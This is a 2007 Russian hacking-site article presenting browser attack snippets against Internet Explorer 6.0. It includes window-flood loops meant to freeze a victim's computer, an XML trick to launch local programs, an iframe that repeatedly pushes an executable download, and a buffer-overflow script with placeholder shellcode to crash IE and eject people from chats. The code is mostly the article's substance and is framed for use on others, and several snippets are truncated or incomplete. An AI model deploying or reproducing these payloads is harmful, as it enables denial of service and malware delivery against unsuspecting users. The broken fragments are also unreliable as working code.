| Меню сайта |
 |
|
|
 |
| Категории каталога |
|
|
|
|
Атака на JavaScript.
Атака на JavaScript.
Принято
считать, что программы на JavaScript безопасные, т.к. выполняются на
виртуальной машине. JavaScript будет работать на любом хостинге,
программный код выполняется по умолчанию, не спрашивая разрешения
пользователя. Всё это делает возможным использования вредоносного
программного кода на JavaScript доступным даже для неопытного
пользователя. Для этого достаточно зарегистрироваться на любом
бесплатном хостинге, создать файл index.html, положить его в корневую
директорию сервера и залить туда JavaScript код. В рамках этой статьи я
рассмотрю лишь некоторые уязвимости к атакам на JavaScript, найденные в
Internet Explorer 6.0.
Этот код начинает бесконечный цикл в следствии которого открывается множество новых окон, что приводит к зависанию компа:
<script>
now();
function now(){for (i=1;i>0;i++){open('die.htm','new'+i);}}
Вот ещё один код, который открывает множество окон:
<html>
<head>
<script language = javascript>
function generate_windows(){
var i=1;
while (i < 10000){ // Главный цикл
window.open("script3.htm"); // Новое окно с ссылкой на тот же HTML файл
i++;
}
}
<body onload= "generate_windows()">
А
вот этот код позволяет запустить на компьютере пользователя любую
программу, если известен путь к ней. Думаю, что не стоит говорить, что
это достаточно серьёзный баг. В данном примере будет запущен редактор
реестра:
<span datasrc="#oExec" datafld="exploit" dataformatas="html">
<xml id="oExec">
<security><exploit>
Следующий
код позволяет инициировать загрузку любого файла с сервера. Многие
пользователи нажимают на кнопки даже не читая, что написано в окне
предупреждения. Если в данном случае пользователь нажмёт "открыть", на
его компьютер загрузится и выполнится указанный вами файл. Если данный
код повторить раз 500, то есть хороший шанс, что атакуемый товарищ всё
же нажмём "открыть". Также возможно зависания компа, когда открываемые
окна сожрут все ресурсы. А вот и код:
<iframe src="zapadlo.exe">
Ниже
приведены два кода, каждый из которых вызывает переполнение буфера в
Internet Explorer и закрытие всех или части его окон. Можно, например,
кого-то выкинуть из чата. Вот первый:
<object id="test" data="#" width="100%" height="100%" type="text/x-scriptlet" VIEWASTEXT
А вот второй:
<script>
wnd=open("about:blank","","");
wnd.moveTo(screen.Width,screen.Height);
WndDoc=wnd.document;
WndDoc.open();
WndDoc.clear();
buffer="??????";
shellcode = "???????";
for(i=0; i<7; i++)buffer+=buffer;
buffer=buffer.substring(0, buffer.length-shellcode.length);
buffer+=shellcode;
for(; i<16; i++)buffer+=buffer;
for(i=0; i<2; i++)WndDoc.write(buffer);
buffer="";
for(i=1;i<=127;i++)buffer+="A";
buffer+="3APA3A ";
WndDoc.write("<HR align='"+buffer+"'>");
WndDoc.execCommand("SelectAll");
WndDoc.execCommand("Copy");
wnd.close();
А с помощью вот этого кода можно открыть CD-ROM на атакуемом компьютере, пользы никакой, зато эффектно :)). А вот и код:
<SCRIPT language="VBScript">
А вот ещё один код, который закрывает браузер IE:
<object>
classid="clsid:7007ACCF-3202-11D1-AAD2-00805FC1270E">
Как
видим, JavaScript оказался не таким уж и безобидным. А что же говорить
об элементах ActiveX! С их помощью можно вообще делать с компом
атакуемого всё, что угодно, т.к. ActiveX является полноценной
программной, в отличии от JavaScript, который выполняется на
виртуальной машине Java! Подробно об этом написано на
http://antichat.ru в статье по ActiveX, очень советую почитать.
|
| Категория: Статьи о взломе и хакерстве | Добавил: baburoff (2007-10-31)
|
Просмотров: 1047
|
|
|
| Форма входа |
|
|
|
| Поиск по каталогу |
|
|
|
|
|
Главная страница 
